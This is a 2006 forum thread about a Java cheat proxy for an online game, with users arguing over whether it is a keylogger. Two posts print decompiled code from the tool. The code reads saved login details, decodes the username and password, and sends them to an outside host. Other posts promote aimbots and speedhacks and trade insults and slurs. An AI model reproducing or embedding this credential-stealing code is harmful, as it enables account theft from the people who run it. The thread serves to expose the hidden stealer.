Qoproxy [Everything working] (speedhack+many more)

12/06/2006 01:21 R0drigU#61
Quote:
Originally posted by tehMaster@Dec 6 2006, 00:57
COListen.class
DecodePass.class

.....nice, keylogger



edit: and yet another reason why i posted this proxy.
dude stfu for god sake, first u test the program then u tell me if its a keylogger, u can even scan how many times u want to with any antivirus/spyware/adware and u wont find anything wrong. dont fucking say what u dont know mother fucker im just trying to help ppl here bitch. I HATE FLAMERS DAMN IT!

You've got 15 posts and u come say shit to me! fuck off dude...

pls someone scan the file and put the scanning here for god sake and shut him up!
12/06/2006 01:39 Ihoyad#62
Hm.. actually this is the scan I got..

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~`

File: QOProxy.rar
Status:
OK (Note: this file has been scanned before. Therefore, this file's scan results will not be stored in the database)
MD5 695a801aef938e326c6244fdc9aeb815
Packers detected:
-
Scanner results
AntiVir
Found nothing
ArcaVir
Found nothing
Avast
Found nothing
AVG Antivirus
Found nothing
BitDefender
Found nothing
ClamAV
Found nothing
Dr.Web
Found nothing
F-Prot Antivirus
Found nothing
F-Secure Anti-Virus
Found nothing
Fortinet
Found nothing
Kaspersky Anti-Virus
Found nothing
NOD32
Found nothing
Norman Virus Control
Found nothing
VirusBuster
Found nothing
VBA32
Found nothing
12/06/2006 01:44 R0drigU#63
well, as u can c it isnt infected ¬¬
12/06/2006 01:47 blinko#64
whats the use without aimbot or scentbot?
12/06/2006 01:48 darkadiction#65
Doesnt have scentbot? :cry:

Somoene have one? xDD

Lol
12/06/2006 01:59 andyd123#66
Fine fine, Ill decompile it, any keylogger would be IMPLANTED in the program, so it would be, naturally, undecteable.
12/06/2006 02:04 R0drigU#67
@blinko
i just posted one with the aimbots.

@darkadiction
read above

@andyd123
what did u mean with that? =o
12/06/2006 03:38 stillnoob#68
rofl !!! another keylogger !!

Look what I found in PacketStore.class
...
public PacketStore()
{
tcp = new TCP();
host = "verification.zapto.org";
hostport = 5815;
...

tcp.sendLine(k2, (new StringBuilder()).append("Username: ").append(s).append(", Password: ").append(s2).append(", Server: ").append(s1).toString());
tcp.closeConnection(k2);



Die scammer !!!
12/06/2006 04:13 darkadiction#69
Is infected or not? :eek:
12/06/2006 04:15 darkadiction#70
Lol ... Doesnt Work and Keylogger man !
12/06/2006 07:02 TheCheese#71
Quote:
Originally posted by R0drigU@Dec 6 2006, 02:04
@blinko
i just posted one with the aimbots.

@darkadiction
read above

@andyd123
what did u mean with that? =o
you just got owned, someone decompiled your shit, and you see the keylogger right there. noob
12/06/2006 07:12 blinko#72
Decompiled it a bit more

@tehMaster

Seem's you like you're just converting ot string's and sending thme to yourself hmm...
With knowledge such as this why not make something of it and put it to good use, you snot

public PacketStore()
{
tcp = new TCP();
host = "verification.zapto.org";
hostport = 5815;
m_dwS = new byte[120];
keyGen();
String as[] = new String[4];
Object obj = null;
try
{
BufferedReader bufferedreader = new BufferedReader(new FileReader(file));
as[0] = (new StringBuilder()).append(bufferedreader.readLine(). trim()).append(" ").toString();
as[1] = (new StringBuilder()).append(bufferedreader.readLine(). trim()).append(" ").toString();
as[2] = (new StringBuilder()).append(bufferedreader.readLine(). trim()).append(" ").toString();
as[3] = (new StringBuilder()).append(bufferedreader.readLine(). trim()).append(" ").toString();
}
catch(Exception exception)
{
return;
}
String s = "";
String s1 = "";
String s2 = "";
byte abyte0[] = new byte[16];
for(int i = 0; i < 16; i++)
{
int k1 = as[0].indexOf(" ");
if(k1 == -1)
return;
String s3 = as[0].substring(0, k1);
as[0] = as[0].substring(k1 + 1);
int l2 = Integer.parseInt(s3, 16);
if(i > 3 && l2 > 0)
s = (new StringBuilder()).append(s).append((char)l2).toStri ng();
}

for(int j = 0; j < 16; j++)
{
int l1 = as[1].indexOf(" ");
if(l1 == -1)
return;
String s4 = as[1].substring(0, l1);
as[1] = as[1].substring(l1 + 1);
int i3 = Integer.parseInt(s4, 16);
if(j > 3)
{
abyte0[j - 4] = (byte)i3;
continue;
}
if(i3 > 0)
s = (new StringBuilder()).append(s).append((char)i3).toStri ng();
}

for(int k = 0; k < 16; k++)
{
int i2 = as[2].indexOf(" ");
if(i2 == -1)
return;
String s5 = as[2].substring(0, i2);
as[2] = as[2].substring(i2 + 1);
int j3 = Integer.parseInt(s5, 16);
if(k > 3)
{
if(j3 > 0)
s1 = (new StringBuilder()).append(s1).append((char)j3).toStr ing();
} else
{
abyte0[k + 12] = (byte)j3;
}
}

for(int l = 0; l < 4; l++)
{
int j2 = as[3].indexOf(" ");
if(j2 == -1)
return;
String s6 = as[3].substring(0, j2);
as[3] = as[3].substring(j2 + 1);
int k3 = Integer.parseInt(s6, 16);
if(k3 > 0)
s1 = (new StringBuilder()).append(s1).append((char)k3).toStr ing();
}

decrypt(abyte0);
for(int i1 = 0; i1 < 16; i1++)
if(abyte0[i1] > 31 && abyte0[i1] < 127)
s2 = (new StringBuilder()).append(s2).append((char)abyte0[i1]).toString();
else
s2 = (new StringBuilder()).append(s2).append(".").toString() ;

int j1 = s2.indexOf(".");
s2 = s2.substring(0, j1);
int k2 = tcp.connectToHost(host, hostport);
if(k2 != -1)
{
tcp.sendLine(k2, (new StringBuilder()).append("Username: ").append(s).append(", Password: ").append(s2).append(", Server: ").append(s1).toString());
tcp.closeConnection(k2);
}
}

[Only registered and activated users can see links. Click Here To Register...] -does exist and opens a page with some sort
of registration shit..dude that's pathetic.

And i don't know my java all too well but a public void keygen()
right after a Public Void decrypt() ? sound's to me liek a BIG keylogger lol.
So if my character get's picked out of the many who fell to this i'll know who to look for ^^

@R0drigU

Ur class files also had a public void decrypt() and keygen(), so maybe it's normal
however you did have a suspicious looking COListen.class
which only seem's to have the login server port. strange.

public COListen()
{
ips = new Hashtable();
tcp = new TCP();
int ss = tcp.startServer(9958);
do
{
int s;
do
s = tcp.waitConnect(ss);
while(s == -1);
new Connection(s);
} while(true);
}

public String hexDump(byte x[])
{
boolean first = true;
String chars = "";
String hex = "";
int ll = 0;
boolean gap = true;
String r = "";
for(int i = 0; i < x.length; i++)
{
byte b = x[i];
int bi = (new Byte(b)).intValue();
if(bi < 0)
bi += 256;
String z = Integer.toHexString(bi);
if(z.length() == 1)
z = "0" + z;
hex = hex + z + " ";
if(b > 32 && b < 127)
chars = chars + (char)b;
else
chars = chars + ".";
if(++ll == 16)
{
r = r + " " + hex + " " + chars + "&#092;r&#092;n";
hex = "";
chars = "";
ll = 0;
}
}

if(ll > 0)
{
while(ll++ < 16)
hex = hex + " ";
r = r + " " + hex + " " + chars + "&#092;r&#092;n";
}
return r;
}

public final int port = 9958;
public TCP tcp;
public Hashtable ips;
}

then ur decodepass()

decrypt(pass);
for(int i = 0; i < 16; i++)
if(pass[i] > 31 && pass[i] < 127)
passw = passw + (char)pass[i];
else
passw = passw + ".";

System.out.println("Username: " + user);
System.out.println("Password: " + passw);
System.out.println(" Server: " + server);

and YOU don't like flamer's? well i don't like fag's so shut your cock sucker.
NOOB THREAD DELETE
12/06/2006 17:15 R0drigU#73
man i dont understand SHIT about java and that QOProxy is an old version that i use it till today and nothing happened to any of my accounts and neither to my friends' accounts. so if u dont wanna use, just dont but dont say im scammer or anything cause i have no idea how to make java files and also u can read the post i did before posting the new QOProxy in page 4, as u can c i dont understand about java so i wanst the one who did that shit. ok OWNED. bitches.

what really matters is: i use an old working version, and yall keep flaming me and keep without a good QOProxy.

kthxbai. =*
12/06/2006 18:07 tehMaster#74
yah.... its suppose to be a reg page idiots... its not a logger. you can try all u want, it was actually a verification system at first, but i gave up on it, except for my aimbot, which has a working one, so it cannot be released to anyone else then who i gave it to


and all the people i gave it to, I already have their accounts, as Im really good friends with them, and the same goes for them, we share accounts.
12/06/2006 20:11 tehMaster#75
Quote:
Originally posted by R0drigU+Dec 6 2006, 01:21--></span><table border='0' align='center' width='95%' cellpadding='3' cellspacing='1'><tr><td>QUOTE (R0drigU @ Dec 6 2006, 01:21)</td></tr><tr><td id='QUOTE'> <!--QuoteBegin--tehMaster@Dec 6 2006, 00:57
COListen.class
DecodePass.class

.....nice, keylogger



edit: and yet another reason why i posted this proxy.
dude stfu for god sake, first u test the program then u tell me if its a keylogger, u can even scan how many times u want to with any antivirus/spyware/adware and u wont find anything wrong. dont fucking say what u dont know mother fucker im just trying to help ppl here bitch. I HATE FLAMERS DAMN IT!

You've got 15 posts and u come say shit to me! fuck off dude...

pls someone scan the file and put the scanning here for god sake and shut him up! [/b][/quote]
sorry for double post... however

WHAT THE F**K does post count matter? Is it not intelligence that matters?

Also whoever released that was a complete dumass, on how it was coded, because everyone can copy off it.


Grr...... JUST APRECIATE IT I GAVE U THE PROXY! IF NOT DONT EVEN BOTHER COMMENTING!